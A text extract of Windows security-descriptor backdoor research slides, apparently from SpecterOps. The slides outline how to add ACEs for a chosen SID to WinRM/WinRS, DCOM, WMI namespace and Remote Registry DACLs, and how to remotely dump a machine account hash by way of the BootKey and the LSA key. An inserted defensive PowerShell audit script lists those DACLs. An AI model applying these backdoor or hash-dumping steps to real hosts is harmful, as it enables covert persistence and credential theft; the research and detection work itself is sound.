      × PowerShell Remoting:
          × Set the new DACL via -SecurityDescriptorSddl of Set-PSSessionConfiguration
      × WinRS:
          × Set WSMan:\localhost\Service\RootSDDL to the new DACL via Set-Item
  • 37. WinRM/WinRS
      × Already weaponized here: https://github.com/ssOleg/Useful_code/blob/master/Set-RemoteShellAccess.ps1
          × In 2014….
      × Takes a domain SID and adds an ACE for that SID to both PowerShell Remoting and WinRS DACLs
      × Allows that specific user/group to remotely interface with WinRM/WinRS without having any additional privilege
  • 38. DCOM
      × Distributed Component Object Model
      × Been around since 1996… >_<
      × Secured via Launch and Activation Permissions
          × Local/Remote, perms reside in the registry
      × Can you use interesting DCOM applications to get code-execution?
          × Applications with “ExecuteShellCommand()”
      × Backdoor your favorite DCOM application for a specific user/group’s SID :-)
  • 39. DCOM
      × Access is determined via machine-wide permissions first and then application-specific permissions
      × Add target user/group to allow machine-wide Remote Activation/Launch Permissions
          × Instead of editing the Default, just edit the Limit
          × HKLM:\Software\microsoft\ole\MachineLaunchRestriction
          × A;;CCRPLC;;;$SID
      × Backdoor a specific DCOM Application for a domain user/group
          × HKLM:\Software\Classes\AppID\{GUID}\LaunchPermission
          × HKLM:\Software\Classes\AppID\{GUID}\AccessPermission
      × Requires: SeTakeOwnershipPrivilege, SeRestorePrivilege, SeSecurityPrivilege if installing locally
  • 42. WMI NameSpaces
      × Contains a collection of WMI classes that host various methods/properties
      × Each namespace has associated DACLs
      × Windows checks the DCOM machine-wide launch permissions for the first stage of access
          × If successful, the DACLs on the WMI namespace are then checked
      × Backdoor a NameSpace that contains a class with a useful method
          × Create() method of Win32_Process, for example
  • 43. WMI NameSpaces
      × Call GetSecurityDescriptor() on the target WMI namespace (local requires SeSecurityPrivilege)
      × Use Win32_Ace to set our Access Mask and flags
      × Use Win32_Trustee to assign the user
      × Set the “Trustee” property of Win32_Ace to our Win32_Trustee object
      × Add our new ACE to the target namespace DACL: $NameSpaceACL.DACL += $Ace.PSObject.ImmediateBaseObject
      × Call SetSecurityDescriptor() with the newly updated NameSpace object to set it
  • 46. Printers
      × Securable Objects
          a. Printer Servers - HKLM\SYSTEM\CurrentControlSet\Control\Print\ServerSecurityDescriptor
          b. Printer Objects - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\<printer>\Security
          c. Print Jobs - Not very interesting offensively
      × Specifications: MS-RPRN, MS-PAR, MS-PAN, MS-PRSOD
  • 51. Remote Registry
      × Allows permitted users/groups to access the registry remotely via .NET/Win32 API
          × [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey()
      × The RemoteRegistry service has to be enabled and the calling user has to have access
          × By default in Windows 7/10, this service is disabled
      × Remote access to the registry == ability to dump hashes (among other things) 😈
  • 52. Remote Registry
      × Imagine this scenario: Remotely dumping an endpoint’s machine account hash as an unprivileged user
      × Remotely backdoor the winreg key for a specified user/group
          × Located at HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg
          × The DACL on this key decides who is allowed to connect via remote registry
  • 53. Remote Registry
      × Can be accomplished via WMI’s StdRegProv provider
          × Call SetSecurityDescriptor() with an ACE that defines the user/permissions for the backdoor
      × Why not just use StdRegProv?
          × Dumping the machine account hash requires obtaining various Registry Key classes
          × Can only be obtained via RegQueryInfoKey()
      × Use Set-Service to remotely set the service StartupType to “Manual”
          × Set-Service -Name "RemoteRegistry" -ComputerName $Computer -StartupType "Manual"
  • 54. Remote Registry
      × Remotely take ownership of the SECURITY registry hive and add an ACE to the DACL for the backdoor user
      × As that user, remotely call RegConnectRegistry()
      × Open the required keys and pull the Key’s Class
          × SYSTEM\CurrentControlSet\Control\Lsa\<JD,Skew1,GBG,DATA>
          × RegOpenKeyEx(), RegQueryInfoKey()
      × Combine these Class values and compute the BootKey
      × Use the BootKey to decrypt the LSA key
      × Use the LSA key to decrypt the machine account hash
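A defensive enumeration pass, added here and not taken from the slides, that reads the DACLs of the host objects discussed on slides 36 (WinRM/WinRS), 43 (WMI namespace) and 52 (winreg key) and lists every trustee with its raw mask, so an ACE added for a single domain SID stands out against a gold-image baseline. It assumes it runs elevated on the host being audited and uses the paths named on those slides; root/cimv2 is the namespace chosen for the demo.

```powershell
# One report row per ACE. SID translation fails for deleted accounts, so that case
# is shown as "(unresolved)" rather than aborting the run.
function New-AceRow {
    param([string]$Object, [string]$Sid, [long]$Mask, [string]$Type)
    $name = '(unresolved)'
    try { $name = ([System.Security.Principal.SecurityIdentifier]$Sid).Translate([System.Security.Principal.NTAccount]).Value } catch {}
    # Domain and local accounts sit under S-1-5-21-*, well-known groups (BA, IU, ...) do not,
    # so an ACE added for a single user or group usually carries a SID of that shape.
    $flag = if ($Sid -like 'S-1-5-21-*') { 'REVIEW' } else { '' }
    [pscustomobject]@{ Object = $Object; Type = $Type; Trustee = $Sid; Name = $name
                       Mask = '0x{0:X8}' -f ($Mask -band 0xFFFFFFFFL); Flag = $flag }
}

# Parse an SDDL string with .NET and emit a row per DACL entry (a NULL DACL yields none).
function Get-SddlAceRows {
    param([string]$Object, [string]$Sddl)
    if ([string]::IsNullOrEmpty($Sddl)) { return }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        New-AceRow -Object $Object -Sid $ace.SecurityIdentifier.Value -Mask $ace.AccessMask -Type $ace.AceType
    }
}

$rows = @(
    # Slide 36: each PowerShell Remoting endpoint exposes its DACL as SecurityDescriptorSddl.
    foreach ($cfg in Get-PSSessionConfiguration) {
        Get-SddlAceRows -Object "WinRM:$($cfg.Name)" -Sddl $cfg.SecurityDescriptorSddl
    }
    # Slide 36: WinRS is governed by the RootSDDL item of the WSMan drive.
    Get-SddlAceRows -Object 'WinRS:RootSDDL' -Sddl (Get-Item WSMan:\localhost\Service\RootSDDL).Value
    # Slide 52: the winreg key DACL decides who may connect through Remote Registry.
    $winreg = Get-Acl -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg'
    Get-SddlAceRows -Object 'winreg' -Sddl $winreg.GetSecurityDescriptorSddlForm('Access')
    # Slide 43: the namespace DACL comes back as Win32_ACE objects rather than SDDL.
    $wmi = Invoke-CimMethod -Namespace root/cimv2 -ClassName __SystemSecurity -MethodName GetSecurityDescriptor
    foreach ($ace in $wmi.Descriptor.DACL) {
        $type = if ($ace.AceType -eq 0) { 'AccessAllowed' } else { 'AccessDenied' }
        New-AceRow -Object 'WMI:root/cimv2' -Sid $ace.Trustee.SIDString -Mask $ace.AccessMask -Type $type
    }
)
# Flagged rows first; compare the rest against the gold image for the same object.
$rows | Sort-Object Flag -Descending | Format-Table -AutoSize
```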
  • 58. SACLs: the other ACL
      × A system access control list
      × “Enables administrators to log attempts to access a secured object”
      × Not used as extensively as they should be!
  • 59. Defensive Enumeration
      × More research is needed - you can’t defend against what you aren’t aware of!
      × Defensive PowerUp++? Operational test framework for the detection of backdoor scenarios?
      × Integration into BloodHound?
  • 60. Takeaways
      × The host-control graph is *MUCH* bigger than “is member of local admin group”
      × What is the real attack surface of a Windows host?
          × Many “forgotten” or unexplored RPC/DCOM servers
          × Many other securable objects we haven’t looked at
  • 61.
  • 62. Takeaways & Future Work
      × Implications of other securable objects
      × Real-time analysis
      × Enumeration of objects visible only to the kernel
      × Chaining host + AD security descriptor abuse
  • 63. Thanks! Any questions? @tifkin_ / @enigma0x3 / @harmj0y https://specterops.io/